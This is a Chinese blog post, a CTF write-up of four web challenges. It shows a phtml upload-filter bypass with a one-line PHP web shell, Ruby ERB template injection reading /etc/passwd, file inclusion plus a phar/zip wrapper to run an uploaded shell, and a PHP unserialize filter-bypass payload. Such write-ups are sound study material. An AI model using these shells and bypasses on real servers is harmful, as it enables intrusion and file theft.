<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>近期比赛的归纳总结 | Iuhrey的幻想乡</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="前言最近比赛一波接一波，但是我又是忙着演出排练没时间打，好不容易抽出时间来比赛又被打的自闭又自闭，写个博客记录一下原来没注意过的小技巧和骚操作吧。 Easy_upload说来惭愧，这是新生赛的一道题目，真的学到了这个技巧。打开页面是一个普通的界面，上传png文件发现了一个过滤：碰到这种过滤，我们可以使用phtml的文件来进行绕过，phtml文件可以把文件中存在html的标签进行处理再作为php文件">
<meta name="keywords" content="比赛心得">
<meta property="og:type" content="article">
<meta property="og:title" content="近期比赛的归纳总结">
<meta property="og:url" content="http://yoursite.com/2018/11/18/近期比赛的归纳总结/index.html">
<meta property="og:site_name" content="Iuhrey的幻想乡">
<meta property="og:description" content="前言最近比赛一波接一波，但是我又是忙着演出排练没时间打，好不容易抽出时间来比赛又被打的自闭又自闭，写个博客记录一下原来没注意过的小技巧和骚操作吧。 Easy_upload说来惭愧，这是新生赛的一道题目，真的学到了这个技巧。打开页面是一个普通的界面，上传png文件发现了一个过滤：碰到这种过滤，我们可以使用phtml的文件来进行绕过，phtml文件可以把文件中存在html的标签进行处理再作为php文件">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/images/21/1.png">
<meta property="og:image" content="http://yoursite.com/images/21/2.png">
<meta property="og:image" content="http://yoursite.com/images/21/3.png">
<meta property="og:image" content="http://yoursite.com/images/21/4.png">
<meta property="og:image" content="http://yoursite.com/images/21/5.png">
<meta property="og:image" content="http://yoursite.com/images/21/6.png">
<meta property="og:image" content="http://yoursite.com/images/21/7.png">
<meta property="og:image" content="http://yoursite.com/images/21/8.png">
<meta property="og:image" content="http://yoursite.com/images/21/9.png">
<meta property="og:image" content="http://yoursite.com/images/21/10.png">
<meta property="og:image" content="http://yoursite.com/images/21/11.png">
<meta property="og:image" content="http://yoursite.com/images/21/12.png">
<meta property="og:image" content="http://yoursite.com/images/21/13.png">
<meta property="og:image" content="http://yoursite.com/images/21/14.png">
<meta property="og:updated_time" content="2018-11-22T13:23:42.108Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="近期比赛的归纳总结">
<meta name="twitter:description" content="前言最近比赛一波接一波，但是我又是忙着演出排练没时间打，好不容易抽出时间来比赛又被打的自闭又自闭，写个博客记录一下原来没注意过的小技巧和骚操作吧。 Easy_upload说来惭愧，这是新生赛的一道题目，真的学到了这个技巧。打开页面是一个普通的界面，上传png文件发现了一个过滤：碰到这种过滤，我们可以使用phtml的文件来进行绕过，phtml文件可以把文件中存在html的标签进行处理再作为php文件">
<meta name="twitter:image" content="http://yoursite.com/images/21/1.png">
  
    <link rel="alternate" href="/atom.xml" title="Iuhrey的幻想乡" type="application/atom+xml">
  
  
    <link rel="icon" href="source/images/favicon.ico">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/plugin/bganimation/bg.css">
  

</head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <div class="outer">
        <div class="widget-wrap mobile-header">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="/images/avatar.jpg">
    <h2 class="author">Iuhrey</h2>
    <h3 class="description">一个常年被吊打的Web手    一个唱歌不好指弹垃圾的吉他手</h3>
    <div class="count-box">
      <a href="/archives"><div><strong>31</strong><br>文章</div></a>
      <a href="/categories"><div><strong>3</strong><br>分类</div></a>
      <a href="/tags"><div><strong>14</strong><br>标签</div></a>
    </div>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>幻想乡的起点</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>幻想乡图</li>
          </a>
        
          <a href="/categories" title="Categories">
            <li>分岔路</li>
          </a>
        
          <a href="/tags" title="Tags">
            <li>路标</li>
          </a>
        
    </ul>
  </div>
</div>

        <section id="main"><article id="post-近期比赛的归纳总结" class="wow slideInRight article article-type-post" itemscope="" itemprop="blogPost">
  <div class="article-meta">
    <a href="/2018/11/18/近期比赛的归纳总结/" class="article-date">
  <time class="post-time" datetime="2018-11-18T15:38:27.000Z" itemprop="datePublished">
    <span class="post-month">11月</span><br>
    <span class="post-day">18</span>
  </time>
</a>
   
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      近期比赛的归纳总结
    </h1>
  

        <div>
          
          
              

          
        </div>
      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>最近比赛一波接一波，但是我又是忙着演出排练没时间打，好不容易抽出时间来比赛又被打的自闭又自闭，写个博客记录一下原来没注意过的小技巧和骚操作吧。</p>
<h2 id="Easy-upload"><a href="#Easy-upload" class="headerlink" title="Easy_upload"></a>Easy_upload</h2><p>说来惭愧，这是新生赛的一道题目，真的学到了这个技巧。<br>打开页面是一个普通的界面，上传png文件发现了一个过滤：<br><img src="/images/21/1.png" alt=""><br>碰到这种过滤，我们可以使用phtml的文件来进行绕过，phtml文件可以把文件中存在html的标签进行处理再作为php文件执行，我们可以上传一个如下的phtml的文件：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language=&quot;php&quot;&gt;</span><br><span class="line">system($_GET[&apos;a&apos;]);</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure></p>
<p>接着找到文件目录执行?a=cd ..;ls查看文件，读取flag.php就行了。</p>
<h2 id="Crazy-Train"><a href="#Crazy-Train" class="headerlink" title="Crazy Train"></a>Crazy Train</h2><p>这题目真的学到了很多东西。这是一道关于Ruby的SSTI注入的题目，里面的技巧会慢慢讲。<br>打开网站发现只是一个简单的留言系统，只有一个新建文章的功能：<br><img src="/images/21/2.png" alt=""><br>点进去发现只有文章标题和文章内容可以编辑：<br><img src="/images/21/3.png" alt=""><br>emmmmm，一开始我是想尝试xss的，但是发现我们好像并不能确定文章是否传过去了，也不能确认是否有admin查看我们的文章，所以只能尝试其他思路…..抓包看看有没有可疑参数：<br><img src="/images/21/4.png" alt=""><br>发现了一个隐藏的参数，结合刚刚我们传文章过去无回显可以猜测一下是不是ssti注入，使用BuiltWith确定框架是Ruby，接着可以尝试一下如下攻击：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%= 2 * 2 %&gt;</span><br></pre></td></tr></table></figure></p>
<p><img src="/images/21/5.png" alt=""><br>接下来就简单多了，查了查Ruby的File类读文件调用方式，如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">File.open(&apos;路径&apos;).read</span><br></pre></td></tr></table></figure></p>
<p>尝试读取/etc/passwd:<br><img src="/images/21/6.png" alt=""><br>接下来的问题就是不知道我们所读取flag的路径在哪里，经过查阅Ruby有关dir类发现了这样一个函数：<br><img src="/images/21/7.png" alt=""><br>接下来就简单了，毕竟什么过滤也没有，操作如下：<br><img src="/images/21/8.png" alt=""><br><img src="/images/21/9.png" alt=""><br><img src="/images/21/10.png" alt=""></p>
<h2 id="Archivr"><a href="#Archivr" class="headerlink" title="Archivr"></a>Archivr</h2><h3 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h3><p>emmmmm，睡了一觉起来发现题目已经关了，真的无语，下一次尽量熬夜复现完吧。<br>点开链接发现是一个可以上传文件的系统，但是只能上传小于5kb的文件，上传文件会得到一个key，通过这个key能下载我们这个文件，不过链接的参数有一个可利用漏洞，文件包含：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://fun.ritsec.club:8004/index.php?page=upload</span><br></pre></td></tr></table></figure></p>
<p>利用文件包含漏洞就能读取出所有的源码，初步审计一波，我把有价值的给挑出来分析：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if ($_SERVER[&apos;REQUEST_METHOD&apos;] === &apos;POST&apos;) &#123;</span><br><span class="line">    if ($_FILES[&apos;upload&apos;][&apos;size&apos;] &gt; 5000) &#123; //max 5KB</span><br><span class="line">        die(&quot;File too large!&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    $filename = $_FILES[&apos;upload&apos;][&apos;name&apos;];</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    $upload_time = time();</span><br><span class="line">    $upload_dir = &quot;uploads/&quot; . md5($_SERVER[&apos;REMOTE_ADDR&apos;]) . &quot;/&quot;;</span><br><span class="line"></span><br><span class="line">    $ext = &quot;&quot;;</span><br><span class="line">    if (strpos($filename, &apos;.&apos;) !== false) &#123;</span><br><span class="line">        $f_ext = explode(&quot;.&quot;, $filename)[1];</span><br><span class="line">        if (ctype_alnum($f_ext) &amp;&amp; stripos($f_ext, &quot;php&quot;) === false &amp;&amp; stripos($f_ext, &quot;pht&quot;) === false) &#123;</span><br><span class="line">            $ext = &quot;.&quot; . $f_ext;</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            $ext = &quot;.dat&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        $ext = &quot;.dat&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">    $upload_path = $upload_dir . md5($upload_time) . $ext;</span><br><span class="line">    mkdir($upload_dir, 0770, true);</span><br><span class="line"></span><br><span class="line">    //Enforce maximum of 10 files</span><br><span class="line">    $dir = new DirLister($upload_dir);</span><br><span class="line">    if ($dir-&gt;getCount() &gt;= 10) &#123;</span><br><span class="line">        unlink($upload_dir . $dir-&gt;getOldestFile());</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    move_uploaded_file($_FILES[&apos;upload&apos;][&apos;tmp_name&apos;], $upload_path);</span><br><span class="line">    $key = $upload_time . $ext;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>这里给了上传文件的储存目录生成方式，以及两个黑名单，通过检查php?或者pht?来过滤文件的后缀名。目录通过获取我们的ip地址以及当前的时间戳来生成最终地址。  </p>
<h3 id="phar协议"><a href="#phar协议" class="headerlink" title="phar协议"></a>phar协议</h3><p>题目过滤了php，php5，phtml等等，通过用一些后缀名来绕过貌似行不通，这里用到了一种协议-phar协议。<br>phar协议适用于php&gt;5.3.0版本，官方文档如下：<br><img src="/images/21/11.png" alt=""><br>简单来说，就是一个打包解包的过程，在我们传输压缩文件的时候，服务器会对压缩包进行解压然后执行文件内容，也就是说我们可以利用phar协议去解析我们上传的压缩包，例如：<br>我们新建一个php文件如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php echo system($_GET[&quot;a&quot;]); ?&gt;</span><br></pre></td></tr></table></figure></p>
<p>将它压缩为zip文件，然后上传使用phar协议去读取../../xxx.zip/xxx.php就能执行任意命令了。 </p>
<h3 id="反向代理"><a href="#反向代理" class="headerlink" title="反向代理"></a>反向代理</h3><p>一般来说，我们通过外网的服务器去请求内网数据的时候，外网的代理服务器就像一个跳板一样，让我们通过它去访问内网的服务器，正向代理的服务器作用也仅仅是作为跳板，但是反向代理不一样，我们访问反向代理服务器，代理服务器会通过自己的ip去访问内网服务器，然后将接受的信息返回给我们，反向代理服务器对外表现就像是一个内网服务器一样。具体分析可以参考：<br><a href="https://www.cnblogs.com/Anker/p/6056540.html" target="_blank" rel="noopener">https://www.cnblogs.com/Anker/p/6056540.html</a>  </p>
<h3 id="解题方法"><a href="#解题方法" class="headerlink" title="解题方法"></a>解题方法</h3><p>既然我们可以通过phar协议去执行命令，那么现在问题就是如何找到目录，我们在源码中看到了服务器会将我们的ip进行md5然后加上当前时间戳的md5加后缀名来生成路径，但是在我加密了我的ip，去访问路径的时候发现返回了404，这就很奇怪，按理来说应该没问题，但是目录不存在是怎么回事？<br>这就是反向代理的原因了，我们访问的服务器是一个代理服务器，而我们所要的资源则是在内网服务器上，所以代理服务器在访问内网资源时，所用的ip就是它本身ip，并不是我们自身的ip，那问题又来了，我们如何得到服务器ip呢？<br>一个大师傅想到了所有的题目都是部署在一个服务器上，那么可以通过其他的题目来获取ip地址啊，例如上一题的Ruby SSTI注入，我们可以获取所有环境变量的信息：<br><img src="/images/21/12.png" alt=""><br><img src="/images/21/13.png" alt=""><br>通过request类来读取服务器ip:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">@_request.instance_variable_get(:env)</span><br></pre></td></tr></table></figure></p>
<p><img src="/images/21/14.png" alt=""><br>上传zip文件，接着访问：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://fun.ritsec.club:8004/uploads/98d3cbed97b0bc491c000455c9f8e6fb/md5(time()).zip/1.php?a=ls</span><br></pre></td></tr></table></figure></p>
<p>读flag文件就行了。  </p>
<h2 id="php-is-funny-chal8"><a href="#php-is-funny-chal8" class="headerlink" title="php_is_funny_chal8"></a>php_is_funny_chal8</h2><p>最近刷题接触到了几道反序列化问题，发现有道题目还是挺好的，补充了一个新的知识点。<br>题目点开扫目录，发现了一个index.php.bak，审计一波代码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">ini_set(&quot;open_basedir&quot;,dirname(__FILE__));</span><br><span class="line">#GOAL: file_get_content(&apos;sbztz.php&apos;)    : )</span><br><span class="line">   </span><br><span class="line">    class just4fun &#123;</span><br><span class="line">        public $filename;</span><br><span class="line">   </span><br><span class="line">        function __toString() &#123;</span><br><span class="line">            return @file_get_contents($this-&gt;filename);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">   </span><br><span class="line">    $data = stripslashes($_GET[&apos;data&apos;]);</span><br><span class="line">    if (!$data) &#123;</span><br><span class="line">        die(&quot;hello from y&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">   </span><br><span class="line">    $token = $data[0];</span><br><span class="line">    $pass = true; </span><br><span class="line">   </span><br><span class="line">    switch ( $token ) &#123;</span><br><span class="line">        case &apos;a&apos; :</span><br><span class="line">        case &apos;O&apos; :</span><br><span class="line">        case &apos;b&apos; :</span><br><span class="line">        case &apos;i&apos; :</span><br><span class="line">        case &apos;d&apos; :</span><br><span class="line">            $pass = ! (bool) preg_match( &quot;/^&#123;$token&#125;:[0-9]+:/s&quot;, $data );</span><br><span class="line">            break;</span><br><span class="line">   </span><br><span class="line">        default:</span><br><span class="line">            $pass = false;</span><br><span class="line">   </span><br><span class="line">    &#125;</span><br><span class="line">   </span><br><span class="line">    if (!$pass) &#123;</span><br><span class="line">      die(&quot;TKS L.N.&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">   </span><br><span class="line">    echo unserialize($data);</span><br><span class="line">?&gt;</span><br><span class="line">&lt;!-- ./challenge8.php.bak --&gt;</span><br></pre></td></tr></table></figure></p>
<p>题目要求就是让我们把sbztz.php给包含出，源码给出了一个类，类里面有一个__toString()函数，只要我们通过序列化触发类里面的函数就行了，payload如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">class just4fun &#123;</span><br><span class="line">    public $filename;</span><br><span class="line"></span><br><span class="line">    function __toString() &#123;</span><br><span class="line">        return @file_get_contents($this-&gt;filename);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$a = new just4fun(&quot;a&quot;);</span><br><span class="line">$a-&gt;filename = &quot;sbztz.php&quot;;</span><br><span class="line">echo serialize($a);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>但是源码有一个过滤需要绕过:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">$token = $data[0];</span><br><span class="line">    $pass = true; </span><br><span class="line">   </span><br><span class="line">    switch ( $token ) &#123;</span><br><span class="line">        case &apos;a&apos; :</span><br><span class="line">        case &apos;O&apos; :</span><br><span class="line">        case &apos;b&apos; :</span><br><span class="line">        case &apos;i&apos; :</span><br><span class="line">        case &apos;d&apos; :</span><br><span class="line">            $pass = ! (bool) preg_match( &quot;/^&#123;$token&#125;:[0-9]+:/s&quot;, $data );</span><br><span class="line">            break;</span><br><span class="line">   </span><br><span class="line">        default:</span><br><span class="line">            $pass = false;</span><br><span class="line">   </span><br><span class="line">    &#125;</span><br><span class="line">   </span><br><span class="line">    if (!$pass) &#123;</span><br><span class="line">      die(&quot;TKS L.N.&quot;);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure></p>
<p>emmm，也就是说我们输入的data不能是例如开头为<strong>O:123:</strong>这种类型的，这里提供了一种比较特殊的绕过方式，分析可以看这篇文章:<a href="http://www.phpbug.cn/archives/32.html。" target="_blank" rel="noopener">http://www.phpbug.cn/archives/32.html。</a><br>里面提到了在我们生成:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:+8:&quot;just4fun&quot;:1:&#123;s:8:&quot;filename&quot;;s:9:&quot;sbztz.php&quot;;&#125;</span><br></pre></td></tr></table></figure></p>
<p>这个payload，在Object后加个+依旧可以正常的反序列化，所以最终payload为<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:+8:&quot;just4fun&quot;:1:&#123;s:8:&quot;filename&quot;;s:9:&quot;sbztz.php&quot;;&#125;</span><br></pre></td></tr></table></figure></p>
<p><strong>PS:直接传参还不行，必须对符号都进行url编码才能得到flag，具体原因不太清楚.</strong></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2018/11/18/近期比赛的归纳总结/" data-id="cjul6evpx0026w8vjkwupg43g" class="article-share-link">分享</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/比赛心得/">比赛心得</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2018/11/28/NCTF-Web-wp/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">上一篇</strong>
      <div class="article-nav-title">
        
          NCTF Web wp
        
      </div>
    </a>
  
  
    <a href="/2018/11/01/结合CVE的一道命令执行弹shell的题目/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">下一篇</strong>
      <div class="article-nav-title">结合CVE的一道命令执行弹shell的题目</div>
    </a>
  
</nav>

  
</article>




  <div id="comments" class="comments">
    <div id="uyan_frame"></div>
  </div>
<script type="text/javascript" src="http://v2.uyan.cc/code/uyan.js?uid=2158764"></script>
</section>
        
          <aside id="sidebar">
  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <h1 class="blog-title">Iuhrey的幻想乡</h1>
    <h2 class="blog-subtitle">记录日常所学</h2>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>幻想乡的起点</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>幻想乡图</li>
          </a>
        
          <a href="/categories" title="Categories">
            <li>分岔路</li>
          </a>
        
          <a href="/tags" title="Tags">
            <li>路标</li>
          </a>
        
    </ul>
  </div>
</div>

  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="/images/avatar.jpg">
    <h2 class="author">Iuhrey</h2>
    <h3 class="description">一个常年被吊打的Web手    一个唱歌不好指弹垃圾的吉他手</h3>
    <div class="count-box">
      <a href="/archives"><div><strong>31</strong><br>文章</div></a>
      <a href="/categories"><div><strong>3</strong><br>分类</div></a>
      <a href="/tags"><div><strong>14</strong><br>标签</div></a>
    </div>



    <div class="social-link">
      
        <a class="hvr-bounce-in" href="http://github.com/NoneGirlIuh" target="_blank" title="Github">
          Github
        </a>
      
    </div>

    <div class="friend-link">
      <h2>友情链接</h2>
      
        <a class="hvr-bounce-in" href="http://blog.shanamaid.top/" target="_blank" title="ShanaMaid">
          ShanaMaid
        </a>
      
        <a class="hvr-bounce-in" href="http://mozhucy.cn/" target="_blank" title="喜欢啥几把BB的狗骑驴">
          喜欢啥几把BB的狗骑驴
        </a>
      
        <a class="hvr-bounce-in" href="http://alittlexyz.cn/" target="_blank" title="喜欢gay在狗骑驴旁边的狗逼">
          喜欢gay在狗骑驴旁边的狗逼
        </a>
      
        <a class="hvr-bounce-in" href="http://zaiyewujiang.cn/" target="_blank" title="gay里gay气的大黄">
          gay里gay气的大黄
        </a>
      
        <a class="hvr-bounce-in" href="http://yulige.top/" target="_blank" title="郁离歌大手子的博客">
          郁离歌大手子的博客
        </a>
      
        <a class="hvr-bounce-in" href="http://shaobaobaoer.cn/" target="_blank" title="有很多小姐姐的烧包包">
          有很多小姐姐的烧包包
        </a>
      
    </div>
  </div>
</div>

  
  <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="330" height="86" src="//music.163.com/outchain/player?type=2&id=541131&auto=1&height=66"></iframe>
</aside>

        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy;2018 - 2019 Iuhrey<br>
      由<a href="http://hexo.io/" target="_blank">Hexo</a>强力驱动 | 
      主题-<a href="https://github.com/ShanaMaid/hexo-theme-shana">Shana</a>
      
        |<script src="http://s11.cnzz.com/z_stat.php?id=1273056144&web_id=1273056144" language="JavaScript"></script>
      
    </div>
<script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <span id="busuanzi_container_site_uv">本站总访问量<span id="busuanzi_value_site_uv"></span>次</span>
  </div>
</footer>
    </div>
    

<script src="//apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>
<script src="//apps.bdimg.com/libs/wow/0.1.6/wow.min.js"></script>
<script>
new WOW().init();
</script>   


  <link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">
  <script src="/plugin/fancybox/jquery.fancybox.pack.js"></script>



  <section class="hidden-xs"> 
  <ul class="cb-slideshow"> 
    <li><span>苟利</span></li> 
    <li><span>国家</span></li> 
    <li><span>生死以</span></li> 
    <li><span>岂能</span></li> 
    <li><span>祸福</span></li> 
    <li><span>趋避之</span></li> 
  </ul>
</section>
<script src="/js/script.js"></script>



  </div>
</body>
</html>